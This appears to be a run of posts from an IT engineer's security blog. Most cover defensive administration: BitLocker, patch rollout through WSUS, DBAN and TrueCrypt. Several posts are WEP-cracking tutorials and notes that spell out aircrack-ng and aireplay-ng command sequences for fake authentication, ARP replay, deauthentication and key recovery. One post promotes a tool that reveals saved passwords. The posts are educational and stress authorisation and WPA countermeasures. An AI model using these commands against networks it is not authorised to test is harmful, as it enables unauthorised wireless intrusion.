Since deployment, Bitlocker has been fantastic. The only issue we’ve had with Bitlocker since we deployed it is that of ensuring that end-users don’t suspend it or disable it, and that we most definitely have a good backup of the recovery key.

Effectively, without a management tool, you fly a bit blind until a problem comes up, or a Bitlockered laptop ends up in your lap with it disabled. Ignorance shouldn’t be bliss when it comes to full disk encryption and protecting your company’s data.

The AD backup of keys is a particular pain, as we’ve found that sometimes, Bitlocker just forgets to back itself up to AD when it’s enabled. To mitigate this, we’ve just instructed Bitlocker to also copy the key to a secure fileshare when it’s enabled during the MDT task, as well as backing it up to AD.

Fortunately, Microsoft have started to build a Bitlocker management tool called Microsoft Bitlocker Administration and Management. You can read more about it on the Windows Team Blog.

It’s still in Beta, but I’m looking forward to trying this out!

Smart Technology – Quick Logons through Facial Recognition

Continuing with the tradition of breaking tradition, ASUS introduces a whole new way in which users logon to their computers—through facial recognition. The SmartLogon system detects the user’s face and logs on without any intervention from the user. This system is designed to learn the variations of the user’s facial features, and is capable of performing detection in different lighting conditions.

Maybe I’m a cynic, but I wonder what happens if you take a photo of the target user, print it out life-size and show it to the camera? It might even work with a high-res passport photo scan. Hmmmm, curious…

Two pieces of malicious software affecting Apple’s Mac OS X appeared this week: a Trojan horse with the ability to download and install malicious code of an attacker’s choice, and a hacker tool for creating backdoors, according to security vendors.

The Trojan — called ‘OSX.RSPlug.D’ by Intego, the Mac security specialist that discovered the threat — is a variant on an older piece of malicious code but with a new installer, Intego said.

Naturally, it targets users in a traditional way:

The Trojan is found on porn websites posing as a codec needed to play video files, a technique used to trick the user into downloading and installing it.

I find myself saying this a fair bit: Mac OS X is not necessarily more secure than any other OS. At the present time, given their lower market share, they’re just not as sweet a target as the Windows install base. As Macs reach a critical mass, they’ll become just as desirable to infect as any other computer.

It seems that no more than a day after Microsoft released a Critical Security update, someone’s released a Trojan into the wild that exploits the vulnerability.

Given the “exploit potential”, this one sounds relatively tame. I suspect it’ll only be a matter of time before the exploit code is perfected and turned into a much more potent animal.

Putting a few hours in on Thursday night, has potentially saved us exponentially more hours in data and service recovery, as well as general IT support. It definitely pays to be proactive!

I thought I’d document what actions I took, in case it helps out anyone in the future. I’d also be interested to hear how you handled the situation, particularly if you did something I missed, or if you think I could have done things better!

History repeating…

Although I remember the impact of Sasser and MyDoom, I’ve never been in the trenches when such a critical update has been launched for Windows.

No-one likes working late at night, but I didn’t fancy the chances that a 0-day exploit may be released and in the wild before we can patch our mission critical servers; so as soon as I found out, I started working on a plan.

The Plan

The plan was relatively simple: Get the update to as many PCs as possible, as soon as possible; with an emphasis on any Servers that provide business-critical services.

Simple enough, but what next?

WSUS

About a month back we setup an internal WSUS server to centralise Windows Updates – quite handy for this type of scenario! The main thing here is to ensure that WSUS has the updates downloaded and approved, ready for deployment. Fortunately it had, as it performs a sync every evening, and automatically approves Critical Updates.

Group Policy

To ensure PCs get the update as fast as possible, we needed to open up GPMC and re-configure all existing Group Policy Objects (GPOs) that address Windows Update configuration.

The Windows Updates settings are under Computer Configuration > Administrative Templates > Windows Components > Windows Update.

Note that, if you don’t have WSUS, you can still make the changes outlined below in order to minimise Time-to-Patch. If you haven’t set “Specify intranet Microsoft update service location”, PCs will automatically ask Microsoft’s update servers on the internet.

What we’re looking to do is:

- Set all PCs to download and schedule updates. This is abnormal for us as we allow our Engineers to dictate when to install updates as it can interfere with Software development and testing.

- Make sure each PC checks for updates with our WSUS server every hour, as opposed to every 22 hours.

- Set PCs to install the updates at 11am. This gives time for people to turn on their PCs, for the PCs to update their Group Policy settings and pick up the new settings, and then to check in with the WSUS server for the new update.

- If the PC missed the 11am deadline (e.g. it wasn’t on) it’ll check whether or not it has updates, and then install the updates after 30 minutes.

Informing End-users

A notification email was crafted to all employees, informing them of the severity of the update, what was being done, and what actions they should take. I’ll include a copy of the email I sent out at the end of the post

Protecting the business

Last night, we couldn’t wait for WSUS to “offer” the update to our servers so I grabbed the Update and manually installed it on each business-critical server, rebooting them promptly.

This morning

That was last night out of the way. This morning and this afternoon I’ve been checking WSUS’s reports to see which PCs have the update installed. As of 1pm, at least 90% of PCs had installed and rebooted. I’ll be chasing the rest later

The notification

As promised, here’s the Email notification sent out to employees:

 
Hi all,

Microsoft has just released a very serious critical security update for Windows operating systems.

To see how this affects you, please see below.

Cambridge Employees

Tomorrow we will be rolling out an essential security update to all Domain-connected Windows PCs. This update is mandatory. If you press Control+Alt+Delete to log in, you are on the domain. If you do not press Ctrl+Alt+Del to log in you should follow the advice for Non-Cambridge employees below.

Although we will be trying our best to force this update out. It’s advisable that if you see the “Yellow shield” in your Task Bar, you should click it and install all updates reboot as soon as possible.

Not doing so poses a serious risk to DisplayLink’s networks.

Non-Cambridge Employees 

If you are not based in Cambridge, you should visit Windows Update as soon as possible and install all updates, specifically this one.

DisplayLink Servers

Servers in the UK will have the update installed and be rebooted as soon as possible to ensure we’re protected.

Further information

Further information on this Critical update can be found on Microsoft’s KB article.

Thanks go to Dave Hill for spotting this one on The Register!

Cheers,
Phil Wiffen
IT Engineer

 

How did you handle it?

As I said earlier, I’d also be interested to hear how you handled the situation, particularly if you did something I missed, or if you think I could have done things better! Let me know in the comments

Install Wireshark:

yum install wireshark

Run a capture:

tethereal -i eth1 -w ~/mycapture.pcap

This command will run Wireshark/Ethereal, capture on the eth1 interface and output the data to /yourhomedir/mycapture.pcap

Why would you want to do this? If you want to capture packets from a headless or remote Linux PC and analyse the data elsewhere.

Right now I’m at home, but I have a headless CentOS box at work that’s running ntop from a mirrored port, in order to look at network traffic flowing over the router. To increase the capability of the CentOS box, I want to use it to capture packets using Wireshark, then download the .pcap file over WinSCP and look at the data on my laptop using Wireshark for Windows.

The first thing that came to mind was protecting internal IIS web servers which have to accept potentially dirty external traffic from the Interwebs; Outlook Web Access, for example.

For more information, InformIT has a nice overview of WAFs.

I’ll be testing this out on one of the Execs later

Grab TrueCrypt 6.0 here

Support for hibernation on computers where the system partition is encrypted (previous versions of TrueCrypt prevented the system from hibernating when the system partition was encrypted). (Windows Vista/XP/2008/2003)

Other things of note include faster encryption/decryption using AES, and faster boot times.

[ Version History ] [ Download Trucrypt 5.1 ]

Why did I embolden Full Disk Encryption? Because UK companies and Government organisations are losing laptops left, right and centre – without encrypting their sensitive contents. As an IT Professional, you’d be crazy to not be investigating the various options for keeping your company’s data safe, in the event of loss or theft.

Check out what’s new in TrueCrypt 5.0.

Found via Network Geek (which I found via Ma.tt)

Finally, I’ve had time to write down my notes on using aircrack-ng with the Airpcap Tx adapter in Windows. Before you read on, please be aware that this isn’t meant to be a guide or tutorial, it’s just my notes. Thanky

Basics

Start capturing:

airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile

Fake auth:

aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC -h AIRPCAPMAC \\.\airpcap00

Start attack:

aireplay-ng --arpreplay -b BSSIDMAC -h CLIENTMAC \\.\airpcap00

Deauth (if we need ARPs):

aireplay-ng –deauth 3 -a BSSIDMAC -c CLIENTMAC \\.\airpcap00

Start cracking:

aircrack-ng -z mycapturefile.cap

Worked example:

airodump-ng.exe \\.\airpcap00 airpcap 11 mycapturefile
aireplay-ng --fakeauth 0 -e "WEP" -a 00:a0:c5:9d:d5:50 -h 00:02:72:67:92:8a \\.\airpcap00
aireplay-ng --arpreplay -b 00:a0:c5:9d:d5:50 -h 00:90:4b:eb:9b:36 \\.\airpcap00
aireplay-ng --deauth 3 -a 00:a0:c5:9d:d5:50 -c 00:90:4b:eb:9b:36 \\.\airpcap00
aircrack-ng -z mycapturefile.cap

Download

I’ve prepared a special release of the aircrack-ng tools originally prepared by CACE Technologies on the AirPcap CDROM. It replaces the new aireplay-ng.exe with an older one which, in my tests, appears to perform better.

Download the release of aircrack-ng for AirPcap Tx

Why should you use DBAN?

If you’re selling your hard drive on eBay, or anywhere else, it’s vital that the data is completely erased as many buyers are scouring for personal data left on hard drives. A format using fdisk is not enough, as a standard format only marks the data as erased – it’s still there, it’s just been hidden from view; and by using readily available tools, it’s incredibly easy to un-hide that data and do whatever you want with it. Securely erasing data is especially important if your decommissioned hard drive has any sensitive data on it – and it’s safe to say that if you care about your privacy, or you’re running a business, most data is sensitive!

Using DBAN

You can boot DBAN from a CD/DVD or a USB drive. Once it’s booted, simply choose a wipe method, and how many rounds of wiping you’d like to perform. From my research online, I’ve found that using a PRNG (Pseudo-Random Number Generation) wipe 8 times over, is the most secure for modern hard drives. Apparently the Guttman (35 round wipe) isn’t as effective on modern drives.

Here’s the basic steps you need:

• Burn the .iso file to a CD (you can use something like ImgBurn)
• Boot up DBAN, and hit Enter to run in Interactive Mode.
• Press the M Key to choose the Method: Scroll down to PRNG and hit Space.
• Press the R Key to choose the Rounds: For high security we need 8 rounds, so replace 1 with 8.
• Hit F10 to start, and wait until done.

If you RDC into the box, and then try to connect to Windows Update, you’ll see a message like this:

Access Denied

Network policy settings prevent you from using Windows Update to download and install updates on your computer.

If you believe you have received this message in error, please check with your system administrator.

Solution

To get around this on the 715N, follow these instructions:

1. Log in as Administrator
2. Go Start > Run… > gpedit.msc
3. In the Left pane: Open User Configuration, Administrative Templates, and then click Start Menu and Taskbar
4. In the Right pane: Double-click on Disable and remove links to Windows Update
5. Choose ‘Disable’ and click OK
6. You can now get Windows Updates via the Start Menu
7. Don’t forget to Enable Automatic Updates! (Control Panel > Automatic Updates)

For any other Operating System, have a look at the Microsoft KB article

Every time you deploy a WEP Access Point, a fluffy kitty dies.

Primer

Recently a team of German cryptography researchers perfected methods to recover a WEP key faster than ever before. The older Weak IV attacks generally needed between 500,000 and 2,000,000 packets to recover a 128-bit WEP key. In contrast, the new PTW method needs a mere 85,000 packets to have a 95% chance of recovering the WEP key.

Unlike the Weak IV attack, instead of collecting weak IVs, the PTW method collects ARP requests and responses to attack the encryption. ARP requests can either be collected naturally, or can be generated via packet injection. Until recently, packet injection was only possible in Linux. With the advent of the AirPcap USB adapter, and some unsupported beta drivers, it’s possible to inject packets in Windows. Update: CACE have released AirPcap Tx, which features fully supported packet injection, for an added premium.

In this tutorial, I’ll guide you through the process of recovering a WEP key, via the PTW attack, in Windows. For this you’ll be using the AirPcap USB adapter, Cain, aircrack-ptw, and the aircrack-ng suite.

Legalities

It’s important to point out that these methods should only be applied with permission from the owner of the target AP. You should either be auditing, penetration testing, or demonstrating the weaknesses of WEP in a Test Lab environment. You should not be using these methods to get “Free internet”!

Preparation

You’ll need:

• An AP configured with WEP
• At least one client associated with the Access Point (to give us an initial ARP request)
• A standard AirPcap Adapter with the unsupported beta packet injection driver or a fully-supported AirPcap Tx.
• Cain and Abel
• aircrack-ng for AirPcap
• aircrack-ptw for Windows

Now you’ll need to prepare the environment:

• Install the beta drivers (or if you have AirPcap Tx, install the drivers from the CD-ROM)
• Plug in the AirPcap
• Install Cain
• Extract aircrack-ng to c:\airpcap\
• Extract aircrack-ptw to c:\airpcap\
• Move aircrack-ptw.exe to the bin folder (this is no longer required – see my notes)
• Optional: To make things easier, move the contents of the bin folder to c:\airpcap\. You’ll then be able to run aircrack-ptw.exe with just c:\airpcap\aircrack-ptw.exe mycapture.cap

Let’s get cracking

I added narration to the video this evening at 20:36. It’s my first attempt at narration, and a little noisy, but I’m sure things will improve as time goes on!

Youtube Video Link

Countermeasures

The primary counter measure to this WEP attack is to cease using WEP and switch your Access Points to WPA encryption. As you’ve seen in this video, WEP is just too easy to crack. For further reading, Wikipedia has an excellent entry on WPA.

Access Points are so cheap now that, if your AP doesn’t support WPA via a firmware upgrade, you can easily afford a new one with full WPA or WPA2 support.

Notes

Note 1: After recording this tutorial, I’ve become aware that, as of version 0.9, aircrack-ng.exe natively supports the PTW attack by using the -z switch. For example: aircrack-ng.exe -z mycapturefile.cap. If you want to use this attack, download aircrack-ng from the authors, and replace aircrack-ng.exe in c:\airpcap with the new one.

Note 2: The whole process from starting capture to recovering the WEP key takes about 10 minutes.

Note 3: It is important that you get the Packet Injection drivers and the aircrack-ng release specifically for the AirPcap adapter, or this will not work.

Note 4: Just to summarise the steps in the video:

1. Run Cain and passively scan for the target AP, making a note of the Channel number.
2. Using the channel number, tell AirPcap to inject packets once it has collected an ARP request. (You can sometimes force an ARP by sending Deauth. To do that, right click on the client. Otherwise, repair the Wireless connection on the client connected to the AP)
3. To use the PTW attack, you need to collect all packets. By running airodump-ng you can collect all the packets generated by Cain. The reason we use airodump-ng instead of Cain, is that Cain only collects WEP IVs.
4. Once you’ve collected enough packets, run aircrack-ptw against the capture file.

As of version 0.9, the aircrack-ng suite natively supports the PTW attack. Download it here. To invoke the PTW attack in aircrack-ng, run it with the -z switch: aircrack-ng.exe -z mycapturefile.cap.

A French chap has compiled Aircrack-PTW for Windows. This is great for anyone using the AirPcap adapter to inject packets in Windows, as the new PTW attack dramatically reduces the amount of packets you need to collect before attempting to crack the WEP key. Notice in the screenshot below, only 83,000 packets were needed to break a 128bit key; as opposed to around 400,000 with the KoreK attack.

The executable is in French but it’s still perfectly usable; All you’re looking for is the WEP key!

Just run it with:

aircrack-ptw.exe yourcapturefile.cap

When I get some time I’ll try to compile a version in English, but for now you can grab the French version: Download Aircrack-PTW for Windows.

I’m in the process of writing up and recording a demonstration of cracking WEP in Windows with AirPcap, Cain, and aircrack-ptw. Expect to see something within a week! Update: Check it out here

Asterisk Key reveals saved passwords from most Windows apps and even Internet Explorer (which is probably a good reason to switch to Firefox!)

It doesn’t work on everything, but it’s worth a shot!

Preparation

You’ll need:

• An AirPcap Tx adapter
• Cain and Abel

Note: It is possible to get this working by using the cheaper “Classic” AirPcap, in conjunction with the old 2.0 Beta Tx Drivers for AirPcap, to enable packet injection capability, but this is entirely unsupported, and is not guaranteed to work. YMMV.

Notes

• To begin ARP injections, AirPcap must capture at least 1 ARP request from a system on the target AP. You can usually force this by sending a Deauth to a connected client.
• Make sure you have over 250,000 IVs before attempting to crack the WEP key.
• In my tests, the old AirPcap (silver-grey) appears to perform significantly faster than the new AirPcap (dark-grey). I think it’s about 10x faster.

The Video

Click Play to get things started.

Additional

Download the full resolution video (Thanks to TAz00 from the Oxid.it forums for the hosting!)

View the video on Youtube

To do this, you’ll need the useful AirPcap USB Wireless Capture Adapter from CACE Technologies. It’s pretty cheap when compared to some of the other Windows hardware solutions, and you’ll be supporting the makers of Wireshark!

Why Windows?

I adore Linux and the entire Open Source movement, but it’s important to recognise that many people out there are locked into Windows; and learning an entirely new OS to perform security testing isn’t cost-effective for their company.

How is WEP cracked?

To crack WEP, you need to exploit a weakness in its implementation, and collect lots of Initialisation Vectors (IVs). In normal WLAN traffic, it would take quite a while to pickup enough IVs – approximately 1 million – so we need to generate our own traffic. There’s two ways we could do this:

1. Generate your own traffic using iperf.
2. Use packet injection using aireplay.

At present, the AirPcap Drivers do not support packet injection in Windows. Fortunately, the makers of AirPcap, CACE Technologies, have said packet injection will be included soon.

Update 2007-06-11: Packet Injection is now possible in Windows with the AirPcap. Please see my posts: Cracking WEP with Cain and Cracking WEP with aircrack-ptw for more information.

What will you need?

• An AirPcap Wireless Capture adapter. This is a great little tool for 802.11 sniffing in Windows. You can even run Kismet with it!
• The Aircrack-ng for AirPcap release by CACE Technologies.
• Your own Wireless Access Point, configured with WEP.
• 3 computers, at least 1 of which should have a Wireless LAN Adapter.
• Enough traffic to generate over 1 million IVs. For this demonstration, we’ll use a Windows release of iperf, called K-perf, to generate lots of traffic.

Let’s get cracking

This guide assumes that you are performing this on a WLAN you have permission to use.

OK let’s do it…

Set up Aircrack

Plug in your AirPcap.

Extract the contents of the aircrack-ng release to C:\aircrack (or wherever, I’m just doing this for tidiness).

Open up the c:\aircrack\bin\ directory and double-click the airodump-ng.exe (this is a specially built release tailored for AirPcap).

Configure it as per your settings [Screenshot: Configuring Airodump-ng]

Generate some traffic

Install K-perf, then run J-perf — the Java front-end — on the two machines connected to the AP. At least one should be connected via Wireless. Set one up as a server, and the other as a client. Remember, we’re just doing this to generate enough traffic on our demo WLAN.

On the Server, choose the ‘Server’ option, then click Run. [Screenshot: Server, Configure K-perf using the Java front-end, J-perf.]

On the Client, type in the Server’s IP address, configure the time iperf should run to 1200, and click Run. [Screenshot: Client, Configure K-perf]

Capture and Crack

Go back to your AirPcap machine and watch the IV frames come in. [Screenshot: Airodump-ng capturing WEP IVs]

When you’ve hit over 1,000,000 frames, open up aircrack-ng_GUI.exe in the c:\aircrack\bin\ directory.

Click the Aircrack-ng tab, and locate your crackme.iv file.

Click launch and wait for the cracker to find your WEP key. [Screenshot: Airocrack-ng cracking WEP]

If aircrack cannot find your WEP key, you may not have enough IVs. To get more IVs, start up airodump-ng.exe again, and when asked the Output filename prefix, give the same name as you did previously. Airodump-ng will then append packets to the original dump.

What next?

Traffic capture

As this is a simulation, now that you have your WEP key, you can continue your penetration testing by using AirPcap with Wireshark to capture all the traffic flowing over your WPA or WEP-enabled WLAN.

Educate!

As one of the aims of my blog is to help people, if you have friends/neighbours/co-workers whose WLANs are WEP enabled, you could demonstrate how easy it is to crack WEP, and then help them set up a properly-implemented WPA/WPA2 WLAN

Did this help you at all? Any questions? Feel free to leave me a comment below!

When AirPcap was first released, only WEP decryption was supported. However, with the release of Wireshark 0.99.5 it is possible to decrypt WPA packets with the AirPcap adapter in Windows. Here’s how:

1. Install Wireshark 0.99.5 or above
2. Run Wireshark
3. Go: View > Wireless Toolbar
4. Click on “Decryption Keys…”
5. Add a new decryption key. In my instance, because I know the Passphrase, I used WPA-PWD. If you’re doing penetration testing and, you have a 64byte string from something like AirCrack, you should use WPA-PSK.
   
6. Capture away. In the screenshots below, I’ve filtered my own Wi-Fi card to cut down on the volume of ‘junk’ and demonstrate that it is, in fact, decrypting the packets on the WLAN.
   

For a lot more information on getting this set up, check out the AirPcap Userguide.

Did this help you at all? Any questions? Feel free to leave me a comment below!